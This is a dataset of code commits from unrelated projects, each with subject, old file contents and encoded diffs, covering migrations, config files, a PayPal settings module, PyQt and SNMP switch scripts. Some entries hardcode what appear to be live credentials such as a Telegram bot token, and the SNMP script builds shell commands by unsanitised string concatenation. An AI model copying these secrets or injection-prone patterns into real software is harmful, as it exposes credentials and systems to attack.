commit
stringlengths 40
40
| subject
stringlengths 1
3.25k
| old_file
stringlengths 4
311
| new_file
stringlengths 4
311
| old_contents
stringlengths 0
26.3k
| lang
stringclasses 3
values | proba
float64 0
1
| diff
stringlengths 0
7.82k
|
|---|---|---|---|---|---|---|---|
5e9224d9f51b8c208f73b7493645fd6aa6b6ef48
|
Removes a typo in a comment: 'not' to 'no'
|
revscoring/features/tests/test_previous_user_revision.py
|
revscoring/features/tests/test_previous_user_revision.py
|
from collections import namedtuple
from mw import Timestamp
from nose.tools import eq_
from ...datasources import previous_user_revision, revision
from ...dependencies import solve
from ..previous_user_revision import seconds_since
def test_seconds_since():
FakeRevisionMetadata = namedtuple("FakeRevisionMetadata",
['timestamp'])
cache = {
revision.metadata: FakeRevisionMetadata(Timestamp(10)),
previous_user_revision.metadata: FakeRevisionMetadata(Timestamp(1))
}
eq_(solve(seconds_since, cache=cache), 9)
# Makes sure we don't crash when there was not previous user revision
cache = {
revision.metadata: FakeRevisionMetadata(Timestamp(10)),
previous_user_revision.metadata: None
}
eq_(solve(seconds_since, cache=cache), 0)
|
Python
| 0.999674
|
@@ -627,17 +627,16 @@
e was no
-t
previou
|
ae1839cbb521be5cb7e76d87bdd65f1e736ccf8d
|
Add python version of register-result with more robust json serialisation
|
register-result.py
|
register-result.py
|
Python
| 0.000001
|
@@ -0,0 +1,742 @@
+#!/usr/bin/env python%0A%0Aimport json%0Aimport socket%0Aimport sys%0A%0Aif len(sys.argv) %3C 4:%0A print(%22Error: Usage %3Cregister-result%3E %3Cclient%3E %3Cname%3E %3Coutput%3E %3Cstatus%3E %3Cttl%3E%22)%0A sys.exit(128)%0A%0Acheck_client = sys.argv%5B1%5D%0Acheck_name = sys.argv%5B2%5D%0Acheck_output = sys.argv%5B3%5D%0Acheck_status = int(sys.argv%5B4%5D)%0Acheck_ttl = int(sys.argv%5B5%5D) if len(sys.argv) %3E 5 else 90000%0A%0A# Our result dict%0Aresult = dict()%0Aresult%5B'source'%5D = check_client%0Aresult%5B'name'%5D = check_name%0Aresult%5B'output'%5D = check_output%0Aresult%5B'status'%5D = check_status%0Aresult%5B'ttl'%5D = check_ttl%0A%0A# TCP socket%0Asock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0Aserver_address = ('localhost', 3030)%0Asock.connect(server_address)%0Aprint (json.dumps(result))%0Asocket.sendall(json.dumps(result))%0A
|
|
1b36f7e837f6c15cab838edfaf6464bef0c88c6d
|
Add migration for request notification types
|
src/ggrc/migrations/versions/20160304124523_50c374901d42_add_request_notification_types.py
|
src/ggrc/migrations/versions/20160304124523_50c374901d42_add_request_notification_types.py
|
Python
| 0
|
@@ -0,0 +1,1834 @@
+%0A%22%22%22Add request notification types%0A%0ARevision ID: 50c374901d42%0ARevises: 4e989ef86619%0ACreate Date: 2016-03-04 12:45:23.024224%0A%0A%22%22%22%0A%0Aimport sqlalchemy as sa%0Afrom alembic import op%0Afrom sqlalchemy.sql import column%0Afrom sqlalchemy.sql import table%0A%0A# revision identifiers, used by Alembic.%0Arevision = '50c374901d42'%0Adown_revision = '1839dabd2357'%0A%0ANOTIFICATION_TYPES = table(%0A 'notification_types',%0A column('id', sa.Integer),%0A column('name', sa.String),%0A column('description', sa.Text),%0A column('template', sa.String),%0A column('instant', sa.Boolean),%0A column('advance_notice', sa.Integer),%0A column('advance_notice_end', sa.Integer),%0A column('created_at', sa.DateTime),%0A column('modified_by_id', sa.Integer),%0A column('updated_at', sa.DateTime),%0A column('context_id', sa.Integer),%0A)%0A%0Adef upgrade():%0A%0A op.bulk_insert(%0A NOTIFICATION_TYPES,%0A %5B%7B%0A %22name%22: %22request_open%22,%0A %22description%22: (%22Notify all assignees Requesters Assignees and %22%0A %22Verifiers that a new request has been created.%22),%0A %22template%22: %22request_open%22,%0A %22advance_notice%22: 0,%0A %22instant%22: False,%0A %7D, %7B%0A %22name%22: %22request_declined%22,%0A %22description%22: %22Notify Requester that a request has been declined.%22,%0A %22template%22: %22request_declined%22,%0A %22advance_notice%22: 0,%0A %22instant%22: False,%0A %7D, %7B%0A %22name%22: %22request_manual%22,%0A %22description%22: %22Send a manual notification to the Requester.%22,%0A %22template%22: %22request_manual%22,%0A %22advance_notice%22: 0,%0A %22instant%22: False,%0A %7D%5D%0A )%0A%0A%0Adef downgrade():%0A op.execute(%0A NOTIFICATION_TYPES.delete().where(%0A NOTIFICATION_TYPES.c.name.in_(%5B%0A %22request_open%22,%0A %22request_declined%22,%0A %22request_manual%22,%0A %5D)%0A )%0A )%0A
|
|
9665113ef9a6f7fae89b8a0b7b15289ac41996f4
|
Create mySolution.py
|
Puzzles/checkio/Home/Min-and-Max/mySolution.py
|
Puzzles/checkio/Home/Min-and-Max/mySolution.py
|
Python
| 0.000001
|
@@ -0,0 +1,1513 @@
+def minMaxArgs(key, operator, *args): %0A if key == None:%0A key = lambda x : x %0A minMaxVal = args%5B0%5D%0A for arg in args:%0A cmpKey = key(arg)%0A if operator(cmpKey, key(minMaxVal)):%0A minMaxVal = arg%0A return minMaxVal%0A%0Adef minMaxIter(iterable, operator, key):%0A if key == None:%0A key = lambda x : x%0A count = 0%0A for item in iterable:%0A if count == 0:%0A minMaxVal = item%0A count += 1%0A cmpKey = key(item)%0A if operator(cmpKey, key(minMaxVal)):%0A minMaxVal = item%0A return minMaxVal%0A%0Adef minmax(operator, *args, **kwargs):%0A if not hasattr(operator, %22__call__%22):%0A raise TypeError(%22operator must be callable%22)%0A if len(args) == 0:%0A raise TypeError(%22expected at least one argument, got 0 arguments%22)%0A key = lambda x : x%0A if %22key%22 in kwargs:%0A key = kwargs%5B%22key%22%5D%0A if not hasattr(key, %22__call__%22):%0A raise TypeError(%22%25s is not callable%22 %25 type(key))%0A elif len(kwargs) %3E 0:%0A raise ValueError(%22unexpected keyword argument%22)%0A if len(args) == 1 and (hasattr(args%5B0%5D, %22__iter__%22) or hasattr(args%5B0%5D, %22__getitem__%22) or hasattr(args%5B0%5D, %22__next__%22)):%0A return minMaxIter(args%5B0%5D, operator, key)%0A else:%0A return minMaxArgs(key, operator, *args)%0A%0Adef max(*args, **kwargs):%0A return minmax(lambda x, y: x %3E y, *args, **kwargs)%0A%0Adef min(*args, **kwargs):%0A return minmax(lambda x, y: x %3C y, *args, **kwargs)%0A
|
|
770f7759ffa8fee19f27f0ec365a86d11dd1454c
|
Version bump.
|
paypal/settings.py
|
paypal/settings.py
|
# coding=utf-8
"""
This module contains config objects needed by paypal.interface.PayPalInterface.
Most of this is transparent to the end developer, as the PayPalConfig object
is instantiated by the PayPalInterface object.
"""
import logging
import os
from pprint import pformat
from paypal.compat import basestring
from paypal.exceptions import PayPalConfigError
logger = logging.getLogger('paypal.settings')
class PayPalConfig(object):
"""
The PayPalConfig object is used to allow the developer to perform API
queries with any number of different accounts or configurations. This
is done by instantiating paypal.interface.PayPalInterface, passing config
directives as keyword args.
"""
# Used to validate correct values for certain config directives.
_valid_ = {
'API_ENVIRONMENT': ['SANDBOX', 'PRODUCTION'],
'API_AUTHENTICATION_MODE': ['3TOKEN', 'CERTIFICATE'],
}
# Various API servers.
_API_ENDPOINTS = {
# In most cases, you want 3-Token. There's also Certificate-based
# authentication, which uses different servers, but that's not
# implemented.
'3TOKEN': {
'SANDBOX': 'https://api-3t.sandbox.paypal.com/nvp',
'PRODUCTION': 'https://api-3t.paypal.com/nvp',
}
}
_PAYPAL_URL_BASE = {
'SANDBOX': 'https://www.sandbox.paypal.com/webscr',
'PRODUCTION': 'https://www.paypal.com/webscr',
}
API_VERSION = '72.0'
# Defaults. Used in the absence of user-specified values.
API_ENVIRONMENT = 'SANDBOX'
API_AUTHENTICATION_MODE = '3TOKEN'
# 3TOKEN credentials
API_USERNAME = None
API_PASSWORD = None
API_SIGNATURE = None
# API Endpoints are just API server addresses.
API_ENDPOINT = None
PAYPAL_URL_BASE = None
# API Endpoint CA certificate chain. If this is True, do a simple SSL
# certificate check on the endpoint. If it's a full path, verify against
# a private cert.
# e.g. '/etc/ssl/certs/Verisign_Class_3_Public_Primary_Certification_Authority.pem'
API_CA_CERTS = True
# UNIPAY credentials
UNIPAY_SUBJECT = None
ACK_SUCCESS = "SUCCESS"
ACK_SUCCESS_WITH_WARNING = "SUCCESSWITHWARNING"
# In seconds. Depending on your setup, this may need to be higher.
HTTP_TIMEOUT = 15.0
def __init__(self, **kwargs):
"""
PayPalConfig constructor. **kwargs catches all of the user-specified
config directives at time of instantiation. It is fine to set these
values post-instantiation, too.
Some basic validation for a few values is performed below, and defaults
are applied for certain directives in the absence of
user-provided values.
"""
if kwargs.get('API_ENVIRONMENT'):
api_environment = kwargs['API_ENVIRONMENT'].upper()
# Make sure the environment is one of the acceptable values.
if api_environment not in self._valid_['API_ENVIRONMENT']:
raise PayPalConfigError('Invalid API_ENVIRONMENT')
else:
self.API_ENVIRONMENT = api_environment
if kwargs.get('API_AUTHENTICATION_MODE'):
auth_mode = kwargs['API_AUTHENTICATION_MODE'].upper()
# Make sure the auth mode is one of the known/implemented methods.
if auth_mode not in self._valid_['API_AUTHENTICATION_MODE']:
choices = ", ".join(self._valid_['API_AUTHENTICATION_MODE'])
raise PayPalConfigError(
"Not a supported auth mode. Use one of: %s" % choices
)
else:
self.API_AUTHENTICATION_MODE = auth_mode
# Set the API endpoints, which is a cheesy way of saying API servers.
self.API_ENDPOINT = self._API_ENDPOINTS[self.API_AUTHENTICATION_MODE][self.API_ENVIRONMENT]
self.PAYPAL_URL_BASE = self._PAYPAL_URL_BASE[self.API_ENVIRONMENT]
# Set the CA_CERTS location. This can either be a None, a bool, or a
# string path.
if kwargs.get('API_CA_CERTS'):
self.API_CA_CERTS = kwargs['API_CA_CERTS']
if isinstance(self.API_CA_CERTS, basestring) and not os.path.exists(self.API_CA_CERTS):
# A CA Cert path was specified, but it's invalid.
raise PayPalConfigError('Invalid API_CA_CERTS')
# set the 3TOKEN required fields
if self.API_AUTHENTICATION_MODE == '3TOKEN':
for arg in ('API_USERNAME', 'API_PASSWORD', 'API_SIGNATURE'):
if arg not in kwargs:
raise PayPalConfigError('Missing in PayPalConfig: %s ' % arg)
setattr(self, arg, kwargs[arg])
for arg in ['HTTP_TIMEOUT']:
if arg in kwargs:
setattr(self, arg, kwargs[arg])
logger.debug(
'PayPalConfig object instantiated with kwargs: %s' % pformat(kwargs)
)
|
Python
| 0
|
@@ -1464,10 +1464,10 @@
= '
-72
+98
.0'%0A
|
2a21ee4b263692872f11ebae18663119c5041d5e
|
Add test for requirements
|
fuel_agent/tests/test_requirements.py
|
fuel_agent/tests/test_requirements.py
|
Python
| 0.000003
|
@@ -0,0 +1,738 @@
+# -*- coding: utf-8 -*-%0A%0A# Copyright 2015 Mirantis, Inc.%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22); you may%0A# not use this file except in compliance with the License. You may obtain%0A# a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS, WITHOUT%0A# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the%0A# License for the specific language governing permissions and limitations%0A# under the License.%0A%0Afrom pkg_resources import require%0A%0A%0Adef test_check_requirements_conflicts():%0A require('fuel_agent')%0A
|
|
1bd9013c925cfbbebcff33bf7796fde729d26b34
|
add cardify script
|
cardify.py
|
cardify.py
|
Python
| 0.000001
|
@@ -0,0 +1,1590 @@
+import os%0Aimport re%0Aimport sys%0Aimport glob%0Aimport errno%0Aimport shutil%0Afrom typing import Dict, Tuple, Union, Any, List, Optional%0Afrom pprint import pprint%0A%0A%0Adef mkdir_p(path: str):%0A try:%0A path = os.path.abspath(path)%0A os.makedirs(path)%0A except OSError as e:%0A if e.errno == errno.EEXIST and os.path.isdir(path):%0A pass%0A else:%0A logger.exception(f'failed at creating directorie(s): %7Bpath%7D')%0A raise e%0A%0A%0Apwd = os.path.abspath(os.path.dirname(__file__))%0Aoutput_dir = f'%7Bpwd%7D/notes/cards'%0Ashutil.rmtree(output_dir)%0Amkdir_p(output_dir)%0A%0A%0Aindex = 0%0Adef write_note(text: str) -%3E str:%0A global index%0A if text.count('%5Cn') %3C 2:%0A return%0A index += 1%0A p = f'%7Boutput_dir%7D/card_%7Bindex:010d%7D.md'%0A with open(p, 'w') as f:%0A prefix = ''.join(%5B'%3Cbr%3E'%5D * 6)%0A f.write(f'%7Bprefix%7D%5Cn%5Cn- ')%0A f.write(text)%0A return p%0A%0A%0Aif __name__ == '__main__':%0A for path in glob.glob(f'%7Bpwd%7D/notes/**/*.md'):%0A if path.endswith('index.md') or path.startswith(output_dir):%0A continue%0A print(f'processing %7Bpath%7D...')%0A with open(path) as f:%0A for i, p in enumerate(re.split('%5Cn- ', f.read())%5B1:%5D):%0A write_note(p)%0A%0A cards = sorted(glob.glob(f'%7Boutput_dir%7D/card*.md'))%0A print(f'wrote #%7Blen(cards)%7D cards, writing index.md...', end=' ')%0A with open(f'%7Boutput_dir%7D/index.md', 'w') as f:%0A f.write('# Cards%5Cn')%0A for card in cards:%0A basename = os.path.basename(card)%0A f.write(f'%5Cn- %5B%7Bbasename%7D%5D(%7Bbasename%7D)')%0A print('done')
|
|
fddbbc536ad5097769d924d49420e7d5d2e5999f
|
Update app/extensions/minify/__init__.py
|
app/extensions/minify/__init__.py
|
app/extensions/minify/__init__.py
|
Python
| 0
|
@@ -0,0 +1,1068 @@
+from htmlmin import Minifier%0A%0A%0Aclass HTMLMIN(object):%0A def __init__(self, app=None, **kwargs):%0A self.app = app%0A if app is not None:%0A self.init_app(app)%0A%0A default_options = %7B%0A 'remove_comments': True,%0A 'reduce_empty_attributes': True,%0A 'remove_optional_attribute_quotes': False%0A %7D%0A default_options.update(kwargs)%0A%0A self.html_minify = Minifier(%0A **default_options)%0A%0A def init_app(self, app):%0A app.config.setdefault('MINIFY_PAGE', True)%0A%0A if app.config%5B'MINIFY_PAGE'%5D:%0A app.after_request(self.response_minify)%0A%0A def response_minify(self, response):%0A %22%22%22%0A minify response html to decrease traffic%0A %22%22%22%0A if response.content_type == u'text/html; charset=utf-8':%0A response.direct_passthrough = False%0A%0A raw_data = response.get_data(as_text=True)%0A%0A response.set_data(%0A self.html_minify.minify(raw_data)%0A )%0A%0A return response%0A return response%0A
|
|
118a4af7fbc2455d1dcde54e7041a3919f760d69
|
Create switch_controls_snmp.py
|
python-mocutils/mocutils/switch_controls_snmp.py
|
python-mocutils/mocutils/switch_controls_snmp.py
|
Python
| 0.000002
|
@@ -0,0 +1,1297 @@
+#! /usr/bin/python%0Aimport os%0A%0Adef make_remove_vlans(vlan_ids,add,switch_ip='192.168.0.1',community='admin'):%0A%09# Expects that you send a string which is a comma separated list of vlan_ids and a bool for adding or removing%0A%09OID_portVlanId='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.1'%0A%09OID_portVlanStatus='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.6'%0A%09for vlan_id in vlan_ids.split(','):%0A%09%09if add:%0A%09%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_portVlanId+'.'+vlan_id+' i '+vlan_id)%0A%09%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_portVlanStatus+'.'+vlan_id+' i 4')%0A%09%09else:%0A%09%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_portVlanStatus+'.'+vlan_id+' i 6')%0Adef edit_ports_on_vlan(port_ids,vlan_id,add,switch_ip='192.168.0.1',community='admin'):%0A%09# Expects that you send a comma separated list of ports%0A %09# A string for vlan_id%0A %09# And a bool for adding (True = adding, False = Removing)%0A%09OID_vlanUntagPortMemberAdd='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.4'%0A%09OID_vlanPortMemberRemove='1.3.6.1.4.1.11863.1.1.4.3.1.1.2.1.5'%0A%09if add:%0A%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_vlanUntagPortMemberAdd+'.'+vlan_id+' s '+'%22'+port_ids+'%22')%0A%09else:%0A%09%09os.system('snmpset -v1 -c'+community+' '+switch_ip+' '+OID_vlanPortMemberRemove+'.'+vlan_id+' s '+'%22'+port_ids+'%22')%0A
|
|
f009f42c168e396e437e08914dc28eb1e08fb7fe
|
test of c++ wavefront code on big donut
|
test/test-bigdonut-cpp.py
|
test/test-bigdonut-cpp.py
|
Python
| 0
|
@@ -0,0 +1,1043 @@
+###%0A### Script for fitting a BIG donut%0A###%0A%0Aimport numpy as np%0A%0Afrom donutlib.donutfit import donutfit%0A%0AfitinitDict = %7B%22nZernikeTerms%22:15,%22fixedParamArray1%22:%5B0,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%5D,%22fixedParamArray2%22:%5B0,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%5D,%22fixedParamArray3%22:%5B0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%5D,%22nFits%22:3,%22nPixels%22:256,%22nbin%22:2048,%22scaleFactor%22:1.0,%22pixelOverSample%22:8,%22iTelescope%22:0,%22inputrzero%22:0.15,%22outputWavefront%22:True,%22debugFlag%22:False,%22gain%22:4.5,%22wavefrontMapFile%22 : %22/Users/roodman/Astrophysics/Donuts/decam_2012-nominalzernike.pickle%22, %22doGridFit%22:True, %22spacing%22:64%7D%0A%0Adf = donutfit(**fitinitDict)%0A%0A# fit donut%0AfitDict = %7B%7D%0AfitDict%5B%22inputFile%22%5D = 'DECam_00236392.S4.0003.stamp.fits'%0AfitDict%5B%22outputPrefix%22%5D = 'DECam_wave_00236392.S4.0003'%0AfitDict%5B%22inputrzero%22%5D = 0.125%0AfitDict%5B%22inputZernikeDict%22%5D = %7B%22S4%22:%5B0.0,0.0,53.0%5D,%22None%22:%5B0.0,0.0,11.0%5D%7D%0Adf.setupFit(**fitDict)%0A%0Adf.gFitFunc.closeFits()%0A%0A
|
|
2f2e7605d87ef06c547df660805abb99835dee18
|
Add a snippet.
|
python/pyqt/pyqt5/widget_QAction.py
|
python/pyqt/pyqt5/widget_QAction.py
|
Python
| 0.000002
|
@@ -0,0 +1,1242 @@
+#!/usr/bin/env python3%0A# -*- coding: utf-8 -*-%0A%0Aimport sys%0Afrom PyQt5.QtCore import Qt%0Afrom PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QAction, QSizePolicy%0A%0Aapp = QApplication(sys.argv)%0A%0A# The default constructor has no parent.%0A# A widget with no parent is a window.%0Awindow = QMainWindow()%0A%0Awindow.setWindowTitle('Hello')%0A%0Alabel = QLabel(%22Press Ctrl+P to print a message on the terminal%22, window)%0Alabel.resize(800, 100)%0A%0A# Set key shortcut ################################%0A%0Adef action_callback():%0A print(%22Hello!%22)%0A%0A%0A# see https://stackoverflow.com/a/17631703 and http://doc.qt.io/qt-5/qaction.html#details%0A%0Aaction = QAction(label) # %3C-%0Aaction.setShortcut(Qt.Key_P %7C Qt.CTRL) # %3C-%0A%0Aaction.triggered.connect(action_callback) # %3C-%0Alabel.addAction(action) # %3C-%0A%0A###################################################%0A%0Awindow.show()%0A%0A# The mainloop of the application. The event handling starts from this point.%0A# The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead. %0Aexit_code = app.exec_()%0A%0A# The sys.exit() method ensures a clean exit.%0A# The environment will be informed, how the application ended.%0Asys.exit(exit_code)%0A
|
|
75a9584cc859d60c598582b382f41bd685579072
|
add a new config file at the project root
|
config.py
|
config.py
|
Python
| 0
|
@@ -0,0 +1,217 @@
+import os%0A%0APYMICRO_ROOT_DIR = os.path.abspath(os.curdir)%0APYMICRO_EXAMPLES_DATA_DIR = os.path.join(PYMICRO_ROOT_DIR, 'examples', 'data')%0APYMICRO_XRAY_DATA_DIR = os.path.join(PYMICRO_ROOT_DIR, 'pymicro', 'xray', 'data')
|
|
8212faa90328daabb85c7e877942a667aa200119
|
add config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,1982 @@
+import configparser%0D%0Aimport datetime%0D%0A%0D%0A__all__ = %5B'blog_name', 'categories', 'dates', 'article_num'%5D%0D%0A%0D%0Aconfig = configparser.ConfigParser()%0D%0Aconfig.read('blog.ini', encoding='utf-8')%0D%0A%0D%0ADEFAULT = config%5B'DEFAULT'%5D%0D%0Ablog_name = DEFAULT.get('blog_name', %22No Name Here%22)%0D%0Apre_category_name = DEFAULT.get('category_name', %22%22) # type: str%0D%0Apre_category_links = DEFAULT.get('category_links', %22%22) # type: str%0D%0Afrom_date = DEFAULT.get('from_date', '201610')%0D%0A%0D%0A# year and month from config%0D%0Afrom_year = int(from_date%5B:4%5D)%0D%0Afrom_month = int(from_date%5B4:%5D)%0D%0Aassert 1 %3C= from_month %3C= 12 and 1970 %3C from_year %3C 9999, 'wrong from_date'%0D%0A%0D%0A# create from_datetime and to_datetime%0D%0Afrom_datetime = datetime.datetime(from_year, from_month, 1)%0D%0Ato_datetime = datetime.datetime.now()%0D%0A%0D%0A# add_month_num%0D%0Aadd_month_num = 3%0D%0A%0D%0A# a function that get year and month after add months%0D%0Adef add_month(year, month, add_num):%0D%0A month = month + add_num%0D%0A if month %3E 12:%0D%0A year += 1%0D%0A month -= 12%0D%0A elif month %3C= 0:%0D%0A year -= 1%0D%0A month += 12%0D%0A return year, month%0D%0A%0D%0A# get dates%0D%0Adates = %5B%5D%0D%0Awhile from_datetime %3C to_datetime:%0D%0A link = '/t/' + str(from_datetime.timestamp())%0D%0A name_start = '%7B%7D%E5%B9%B4%7B%7D%E6%9C%88'.format(str(from_datetime.year), str(from_datetime.month))%0D%0A new_year, new_month = add_month(from_datetime.year, from_datetime.month, add_month_num)%0D%0A from_datetime = datetime.datetime(new_year, new_month, 1) # new from_datetime%0D%0A%0D%0A to_year, to_month = add_month(from_datetime.year, from_datetime.month, -1)%0D%0A name_end = '%7B%7D%E5%B9%B4%7B%7D%E6%9C%88'.format(str(to_year), str(to_month))%0D%0A link += '_to_' + str(from_datetime.timestamp())%0D%0A dates.append((link, name_start+' %E8%87%B3 '+name_end))%0D%0A%0D%0A# get categories%0D%0Acategory_name = %5Bx.strip() for x in pre_category_name.split('%7C')%5D%0D%0Acategory_links = %5B'/c/'+x.strip() for x in pre_category_links.split('%7C')%5D%0D%0Acategories = list(zip(category_links, category_name))%0D%0A%0D%0A# get article_num%0D%0Aarticle_num = DEFAULT%5B'article_num'%5D%0D%0A
|
|
5259453165cca4767743469b5e77c6eabe444839
|
add config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,382 @@
+class Config(object):%0A DEBUG = False%0A TESTING = False%0A CSRF_ENABLED = True%0A SECRET_KEY = 'this-really-needs-to-be-changed'%0A%0A%0Aclass ProductionConfig(Config):%0A DEBUG = False%0A%0A%0Aclass StagingConfig(Config):%0A DEVELOPMENT = True%0A DEBUG = True%0A%0A%0Aclass DevelopmentConfig(Config):%0A DEVELOPMENT = True%0A DEBUG = True%0A%0A%0Aclass TestingConfig(Config):%0A TESTING = True
|
|
979d0906ba1bc7f3ec3e77a6e09ec8a1a2449323
|
add clean config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,882 @@
+import os%0A%0Aworkspace = os.getcwd()%0A%0Agnu_CC = 'gcc'%0Agnu_CXX = 'g++'%0A%0Aclang_CC = 'clang'%0Aclang_CXX = 'clang++'%0A%0Aintel_CC = 'icc'%0Aintel_CXX = 'icpc'%0A%0Ampi_CC = 'mpicc'%0Ampi_CXX = 'mpic++'%0A%0A# keywords are: $mpi_nprocs, $ncores%0Ampi_RUN = 'mpirun -hostfile hostfile -np $mpi_nprocs'%0A%0Acore_per_node = 2%0A# tmp dir to launch a run.%0Atmp_dir = os.path.join(workspace, 'tmp')%0A# tmp dir to store results after a run.%0Aresults_dir = os.path.join(workspace, 'results')%0A%0A## Cases directory, makes life easier when they're distinct.%0Acase_ic = os.path.join(workspace, 'casepy') # Where the python scripts to build initial condition are.%0Acase_input = os.path.join(workspace, 'caseinput') # Where the built initial conditions are (heady) %0Acase_ref = os.path.join(workspace, 'caseref') # Where the references (results to compare with) are%0A%0A#What you can add in your hostfile for mpirun.%0A#localhost slots=4%0A
|
|
47b88e59781cf2aeb1a4bb3b6b97ceaf6b883820
|
Add prime count
|
cpp_10.py
|
cpp_10.py
|
Python
| 0.99981
|
@@ -0,0 +1,657 @@
+first_number = int(input())%0A%0Aif 0 == int(first_number):%0A print('none')%0A exit()%0A%0Aprime_count = '' %0A%0Awhile True:%0A%0A if 2 == first_number:%0A prime_count = '2'%0A break%0A%0A running_number = first_number%0A divider = first_number // 2 if ( 0 == first_number %25 2 ) else ( first_number // 2 ) + 1;%0A count = 0%0A%0A while divider != 1:%0A if 0 == running_number %25 divider:%0A count += 1%0A%0A divider -= 1%0A%0A if count == 0:%0A prime_count += ' ' + str( running_number )%0A%0A first_number -= 1%0A if 1 == first_number:%0A break%0A%0Ap = ''%0Afor c in prime_count.strip().split():%0A p = c + ' ' + p%0Aprint( p.strip() )%0A
|
|
ccac9cddfad2b883fc8e2c7c8ab27607ba8c4c63
|
Create config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,958 @@
+token = '252128496:AAHUDCZJlHpd21b722S4B_n6prn8RUjy4'%0Ais_sudo = '223404066' #@This_Is_Amir%0Arelam = '-133494595'%0A# ___ __ __ _ _ _ _____ %0A# / _ %5C / _%7C/ _%7C %7C (_) %5C %7C %7C __%7C_ _%7C__ __ _ _ __ ___ %0A#%7C %7C %7C %7C %7C_%7C %7C_%7C %7C %7C %7C %5C%7C %7C/ _ %5C%7C %7C/ _ %5C/ _ %7C _ _ %5C %0A#%7C %7C_%7C %7C _%7C _%7C %7C___%7C %7C %7C%5C %7C __/%7C %7C __/ (_%7C %7C %7C %7C %7C %7C %7C %0A #%5C___/%7C_%7C %7C_%7C %7C_____%7C_%7C_%7C %5C_%7C%5C___%7C%7C_%7C%5C___%7C%5C__,_%7C_%7C %7C_%7C %7C_%7C %0A %0A
|
|
9fae2d4c7ecc35bde8079f5a71a2b369690cd9a3
|
add config.py
|
config.py
|
config.py
|
Python
| 0.000002
|
@@ -0,0 +1,426 @@
+import os%0Aimport stripe%0A%0Astripe_keys = %7B%0A 'secret_key': os.environ%5B'SECRET_KEY'%5D,%0A 'publishable_key': os.environ%5B'PUBLISHABLE_KEY'%5D%0A%7D%0A%0ASALESFORCE = %7B%0A %22CLIENT_ID%22: os.environ%5B 'SALESFORCE_CLIENT_ID' %5D,%0A %22CLIENT_SECRET%22: os.environ%5B 'SALESFORCE_CLIENT_SECRET' %5D,%0A %22USERNAME%22: os.environ%5B 'SALESFORCE_USERNAME' %5D,%0A %22PASSWORD%22: os.environ%5B 'SALESFORCE_PASSWORD' %5D,%0A %22HOST%22: os.environ%5B %22SALESFORCE_HOST%22 %5D%0A%7D%0A
|
|
298f7d65ba29a0524ff2a3f8eb4b564ed91ad057
|
Document find_by_name so I remember what to do with it.
|
rightscale/util.py
|
rightscale/util.py
|
import os.path
import ConfigParser
CFG_USER_RC = '.rightscalerc'
CFG_SECTION_OAUTH = 'OAuth'
CFG_OPTION_ENDPOINT = 'api_endpoint'
CFG_OPTION_REF_TOKEN = 'refresh_token'
_config = None
class HookList(list):
pass
class HookDict(dict):
pass
def get_config():
global _config
if not _config:
_config = ConfigParser.SafeConfigParser()
# set up some defaults - too bad only newer pythons know how to do this
# more gracefully:
_config.add_section(CFG_SECTION_OAUTH)
_config.set(CFG_SECTION_OAUTH, CFG_OPTION_ENDPOINT, '')
_config.set(CFG_SECTION_OAUTH, CFG_OPTION_REF_TOKEN, '')
home = os.path.expanduser('~')
rc_file = os.path.join(home, CFG_USER_RC)
_config.read(rc_file)
return _config
def get_rc_creds():
"""
Reads ~/.rightscalerc and returns API endpoint and refresh token.
Always returns a tuple of strings even if the file is empty - in which
case, returns ``('', '')``.
"""
config = get_config()
try:
return (
config.get(CFG_SECTION_OAUTH, CFG_OPTION_ENDPOINT),
config.get(CFG_SECTION_OAUTH, CFG_OPTION_REF_TOKEN),
)
except:
return ('', '')
def find_href(obj, rel):
for l in obj.get('links', []):
if l['rel'] == rel:
return l['href']
def find_by_name(res, name):
params = {'filter[]': ['name==%s' % name]}
found = res.index(params=params)
if len(found) > 1:
raise ValueError("Found too many matches for %s" % name)
return found[0]
|
Python
| 0
|
@@ -1378,19 +1378,211 @@
ame(
-res, name):
+collection, name):%0A %22%22%22%0A :param rightscale.ResourceCollection collection: The collection in which to%0A look for :attr:%60name%60.%0A%0A :param str name: The name to look for in collection.%0A %22%22%22
%0A
@@ -1637,19 +1637,26 @@
found =
-res
+collection
.index(p
|
fc7da8e039c38140f3855e8c58d1db9a4e8ed133
|
add demo about using ftplib.FTP
|
reading-notes/CorePython/src/ftp.py
|
reading-notes/CorePython/src/ftp.py
|
Python
| 0
|
@@ -0,0 +1,2318 @@
